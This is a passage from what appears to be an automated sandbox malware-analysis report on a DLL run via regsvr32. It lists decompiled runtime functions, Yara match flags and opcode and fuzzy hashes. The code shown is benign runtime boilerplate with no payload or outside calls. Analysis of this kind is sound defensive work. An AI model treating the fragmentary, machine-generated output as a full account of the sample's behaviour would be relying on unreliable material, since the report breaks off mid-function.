                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID: *.*
                                                                              • API String ID: 1889659487-438819550
                                                                              • Opcode ID: 9747fc117363e519ceff3154e78262c818d3c2d3653dcdc9954432c0ac3912a6
                                                                              • Instruction ID: fa403f2dba87b4e9a1e7adfcd136a53497dab3a56ec5aefd9f93a6ca7e59dc1d
                                                                              • Opcode Fuzzy Hash: 9747fc117363e519ceff3154e78262c818d3c2d3653dcdc9954432c0ac3912a6
                                                                              • Instruction Fuzzy Hash: 4FA1E476701A8187DB05DB29E85125E73A0FBC5BD1F50812AEB5E4BBA4EF38C845C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10040650 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E10040650(long long __rax) {
				long long _t6;

				_t6 = __rax;
				E1003CD20(SetUnhandledExceptionFilter(??), __rax, __rax);
				 *0x100757a8 = 1;
				 *0x100757a0 = _t6;
				return 0;
			}




                                                                              0x10040650
                                                                              0x10040664
                                                                              0x10040669
                                                                              0x10040670
                                                                              0x1004067d

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 1004065B
                                                                                • Part of subcall function 1003CD20: FlsGetValue.KERNEL32(?,?,00000000,100482A0), ref: 1003CD34
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandledValue
                                                                              • String ID:
                                                                              • API String ID: 4104407774-0
                                                                              • Opcode ID: f740a21670e3645d0ac9c62df64011b410e032e6c6a8736bb8b66397d24b07cf
                                                                              • Instruction ID: e6cf223ece61760dad22922bfe42af7210774ba9ddce5dc4c368057b89cb1a5c
                                                                              • Opcode Fuzzy Hash: f740a21670e3645d0ac9c62df64011b410e032e6c6a8736bb8b66397d24b07cf
                                                                              • Instruction Fuzzy Hash: 92D0C934615A80C5E60ADB65BC453C636A0A358306FC05824D4C986321EAFD60D9C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10040680 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E10040680(intOrPtr __rax) {
				_Unknown_base(*)()* _t1;
				_Unknown_base(*)()* _t3;
				intOrPtr _t6;

				if( *0x100757a8 != 0) {
					_t6 =  *0x100757a0; // 0x7389570c0
					E1003CDF0(_t1, __rax, _t6);
					_t3 = SetUnhandledExceptionFilter(??);
					 *0x100757a8 = 0;
					return _t3;
				}
				return _t1;
			}






                                                                              0x1004068b
                                                                              0x1004068d
                                                                              0x10040694
                                                                              0x1004069c
                                                                              0x100406a2
                                                                              0x00000000
                                                                              0x100406a2
                                                                              0x100406ad

                                                                              APIs
                                                                                • Part of subcall function 1003CDF0: FlsGetValue.KERNEL32 ref: 1003CE04
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 1004069C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandledValue
                                                                              • String ID:
                                                                              • API String ID: 4104407774-0
                                                                              • Opcode ID: 4d4d46340929cbdf680c98b7e76f0da957a1f37521f59988d95b822c3bcfe2b7
                                                                              • Instruction ID: 9ed9b824635ea7a72f4ee391b2c6507b0978d717bb9948bca91ccac6007c7b6e
                                                                              • Opcode Fuzzy Hash: 4d4d46340929cbdf680c98b7e76f0da957a1f37521f59988d95b822c3bcfe2b7
                                                                              • Instruction Fuzzy Hash: 84D0A924E092C0C8FB0BE72ABC843C83A80A389306FA00014D4C60622289EC20C8C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001ABE8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !O
                                                                              • API String ID: 0-2378650393
                                                                              • Opcode ID: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                                                              • Instruction ID: 4170ec84c9d3f49002394f5178db7bb3edfe66952fd3c2890134f0e6da5031b0
                                                                              • Opcode Fuzzy Hash: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                                                              • Instruction Fuzzy Hash: F2E10A711087C88BDBFADF64C88ABDE3BACFB44748F105519EA0A9E258CB745748CB01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001100C Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ^Lu
                                                                              • API String ID: 0-3854589714
                                                                              • Opcode ID: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                                                              • Instruction ID: 7c859a126a25bd0c02bef77f14247f717a5a9adcaacfb9e6f8c6730b8303fd88
                                                                              • Opcode Fuzzy Hash: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                                                              • Instruction Fuzzy Hash: E4A128709047498FCB9DCF68C88A6EEBBF1FF48384F204119EA46A7250D7759A85CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180007634 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Z"
                                                                              • API String ID: 0-1896177830
                                                                              • Opcode ID: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                                                              • Instruction ID: 91163448777d7afc4cc80e296cb9cfbd8772b1902329242c75d45222aab24025
                                                                              • Opcode Fuzzy Hash: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                                                              • Instruction Fuzzy Hash: C0A165B590060DCFCBA8CF78D15A68E7BF1BB04308F606129EC269A262E774D619CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180004264 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Qhm
                                                                              • API String ID: 0-202924511
                                                                              • Opcode ID: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                                                              • Instruction ID: dff427aa29f5729145b0ab8b996757c093157db28b416262619acb8c77b37c14
                                                                              • Opcode Fuzzy Hash: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                                                              • Instruction Fuzzy Hash: 1D511479517209CBCB69CF38D4D56E93BE0EF68344F20012DFC668B2A2DB70D5268B48
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001303C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -]
                                                                              • API String ID: 0-3195032325
                                                                              • Opcode ID: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                                                              • Instruction ID: 01c3c27378e714c100c9a801295078fc99e5b088b1ed4129002e73aaaa485763
                                                                              • Opcode Fuzzy Hash: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                                                              • Instruction Fuzzy Hash: 0151297010064D8BCB49DF28D4855D93FE1FB0C3ACF1A6318FD4AAA251D774D989CB88
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000F2DC Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: J_H
                                                                              • API String ID: 0-3345504573
                                                                              • Opcode ID: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                                                              • Instruction ID: 228b1474463df3943694e07488ce24e2c321c70e95dbe7fca5aca48057557888
                                                                              • Opcode Fuzzy Hash: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                                                              • Instruction Fuzzy Hash: EE71E3B1904789CBDBB9DFA4C8896DDBBB0FB48344F20421EDC5AAB251DBB45685CF01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180019900 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: o-b
                                                                              • API String ID: 0-1062997908
                                                                              • Opcode ID: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                                                              • Instruction ID: 42124e7df8dcd8895505725edc86312d8ed31e4959f5f45477de907a66349d68
                                                                              • Opcode Fuzzy Hash: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                                                              • Instruction Fuzzy Hash: 5951177050064D8BDB94DF58C48A6DE3BE0FB28398F254219FC4AA6250D7789699CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800254E4 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8:*
                                                                              • API String ID: 0-724269717
                                                                              • Opcode ID: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                                                              • Instruction ID: 711009871b2250b35f00fe0553413368f045348530dbac453829dc2cbdd56c12
                                                                              • Opcode Fuzzy Hash: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                                                              • Instruction Fuzzy Hash: DE519FB491074A8FCF48CF68D48A4DEBFB0FB68398F604519EC56AA250D37496A4CFD4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002A6BC Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Mf_
                                                                              • API String ID: 0-1332758469
                                                                              • Opcode ID: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                                                              • Instruction ID: 588ebf95624ee4adfb38f08f1f8e1a2e631849e2b9196c961bccb52f3d8eb30d
                                                                              • Opcode Fuzzy Hash: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                                                              • Instruction Fuzzy Hash: 72413A7051034E8BDB49DF24C88A6DE3FA0FB28388F254619FC4AA6250D774DA99CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800010E8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #X
                                                                              • API String ID: 0-1684620495
                                                                              • Opcode ID: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                                                              • Instruction ID: f9643209bdbdb1888c2e59a9774da8228396ec72f530c9748c2220c9be6d5877
                                                                              • Opcode Fuzzy Hash: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                                                              • Instruction Fuzzy Hash: BC41B2B050C3858BC368DF69D49A51BFFF0FB8A344F104A1DF68686660D7B6D985CB06
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002A0F8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *ZP
                                                                              • API String ID: 0-3785686542
                                                                              • Opcode ID: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                                                              • Instruction ID: cd700ac0e72fdea100a6c678007ea8a5747de393b09cc95ae15ed8a735d2c9a6
                                                                              • Opcode Fuzzy Hash: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                                                              • Instruction Fuzzy Hash: C351A3B490038EDFCB89CF64D88A5CE7BB0FB14358F104A19F826A6260D7B49665CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000FE08 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: m9
                                                                              • API String ID: 0-3356931199
                                                                              • Opcode ID: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                                                              • Instruction ID: d52339509a2a8a66acc38e501e73e88f1da459d23edb33c529fdb618239225c9
                                                                              • Opcode Fuzzy Hash: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                                                              • Instruction Fuzzy Hash: AC41DFB091074E8BDB48CF68C48A5DE7FF0FB58388F24821DE816A6250D3B496A4CFD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000BC70 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: T7
                                                                              • API String ID: 0-2187045315
                                                                              • Opcode ID: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                                                              • Instruction ID: e445a35d468e15d444dcf9e81ad6d1cbfbebd9662ebae466ae50992912f39bd9
                                                                              • Opcode Fuzzy Hash: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                                                              • Instruction Fuzzy Hash: 6B41E3B191074A8BCF48CF68C48A4DE7FB0FF68398F214609E856A6250D3B496A5CFD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002143C Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Y[
                                                                              • API String ID: 0-1945238269
                                                                              • Opcode ID: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                                                              • Instruction ID: 277041adf1a083522e20f1ff56a0db14356653c4c70dd43ccf4c86f47916e8c3
                                                                              • Opcode Fuzzy Hash: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                                                              • Instruction Fuzzy Hash: C941E67091038E8FCB48DF68C88A5DE7BB1FB58358F10461DEC6AAB250D3B49664CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180029DF0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: [
                                                                              • API String ID: 0-784033777
                                                                              • Opcode ID: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                                                              • Instruction ID: 430e1a122fe0b20a7e1e6f195b5c5d6ab4e3c741a825a8fe397d5d7cdac5a180
                                                                              • Opcode Fuzzy Hash: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                                                              • Instruction Fuzzy Hash: 2841E4B090074E8BCB48CF64C89A4EE7FF1FB68358F11461DE856A6250D3B496A5CFC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180003840 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: wo0
                                                                              • API String ID: 0-1782833155
                                                                              • Opcode ID: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                                                              • Instruction ID: 9062cfcdbd96f40b118b25d613ee2554a2eb62b456f013d12e1abcba11dd4c76
                                                                              • Opcode Fuzzy Hash: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                                                              • Instruction Fuzzy Hash: AD4104B090034E8BCB48CF68C4865DE7FB0FB48358F11861DE85AAA250D7749664CFC4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000E638 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: [Mh<
                                                                              • API String ID: 0-3342980100
                                                                              • Opcode ID: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                                                              • Instruction ID: 3dfa530075d16dbdc0ab74c4fd592fdc9016efe2b3d8749faa49a3b984689735
                                                                              • Opcode Fuzzy Hash: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                                                              • Instruction Fuzzy Hash: 3D41B4B090034E8BDB88DF68C88A4DE7FF0FB58398F104619E855A6250D37496A4CFC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000B444 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: m?@
                                                                              • API String ID: 0-4017832957
                                                                              • Opcode ID: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                                                              • Instruction ID: 763f89865c62d32814b91696e152b9bff8d9fc03c4acc356d14baff2dc9750fc
                                                                              • Opcode Fuzzy Hash: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                                                              • Instruction Fuzzy Hash: B231BF752187858BC749DF28C04A41ABBE1FB8D30CF504B2DF4CAA6350D778D616CB4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800064D0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MR
                                                                              • API String ID: 0-1985102067
                                                                              • Opcode ID: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                                                              • Instruction ID: 3dc758c2b0da019c4ef40f7354f1f5afd613488c2e2992af3e697213e5bda16f
                                                                              • Opcode Fuzzy Hash: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                                                              • Instruction Fuzzy Hash: 9F215CB05187808BD749DF28C55941EBBE1BB9D30CF804B2DF4CAAA251D778DA05CF4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180010050 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: h{9
                                                                              • API String ID: 0-709585855
                                                                              • Opcode ID: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                                                              • Instruction ID: 28d7748f9e23597285172eede27c795ca80d4d45ffdf147c2eecc812d7a7424c
                                                                              • Opcode Fuzzy Hash: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                                                              • Instruction Fuzzy Hash: A22180B152D785AFC788DF28C59991ABBE0FB98308F806E1DF9868A250D374D545CB43
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800036A8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =WQ
                                                                              • API String ID: 0-979633440
                                                                              • Opcode ID: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                                                              • Instruction ID: f1c989dca105177ef840caf4573424004201902730bc760d24db79eb0592445f
                                                                              • Opcode Fuzzy Hash: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                                                              • Instruction Fuzzy Hash: 2C2146746187848B8749DF28C44A51ABBE1BB8D30CF804B1DF8CAAB250D7789A05CB4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D560 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E1003D560(void* __ecx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				long long _v16;
				void* _t14;
				void* _t22;
				long long _t25;
				void* _t34;
				long long _t36;
				void* _t39;
				void* _t44;

				_t46 = __r13;
				_t36 = __rsi;
				_t27 = __rbx;
				_t25 = __rax;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				_v8 = __r12;
				_v16 = __r13;
				_t34 = __r8;
				r13d = 0xffffffff;
				_a8 = __rbx;
				_t39 = __rdx;
				_t44 = __rcx;
				while(1) {
					_t14 = E1003BA60(_t14, _t27, _t44, _t39, _t34, _t36, _t39, _t34, _t44, _t46);
					_t27 = _t25;
